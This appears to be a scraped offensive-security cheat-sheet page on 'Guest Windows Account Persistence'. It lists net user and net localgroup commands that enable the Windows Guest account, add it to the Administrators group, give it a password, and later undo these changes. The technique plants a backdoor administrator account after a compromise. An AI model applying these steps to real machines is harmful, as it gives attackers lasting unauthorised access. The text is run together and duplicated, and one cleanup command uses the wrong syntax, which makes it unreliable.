Guest Windows Account Persistence
net user Guestnet user Guest /ACTIVE:yesnet localgroup Administrators Guest /add net user Guest <password>net localgroup Guest /ACTIVE:no net localgroup Administrators Guest /delete Last updated
Win10 Guest user account is not supported
If it is not present you can add the account
If it is, you will need to enable it
net user GuestNow activate it
net user Guest /ACTIVE:yesAdd it to the Admins group
net localgroup Administrators Guest /add Set a password for the now enabled Admin Guest account
net user Guest <password>Disable the Guest Account
net localgroup Guest /ACTIVE:no Remove from the Administrators group
net localgroup Administrators Guest /delete Last updated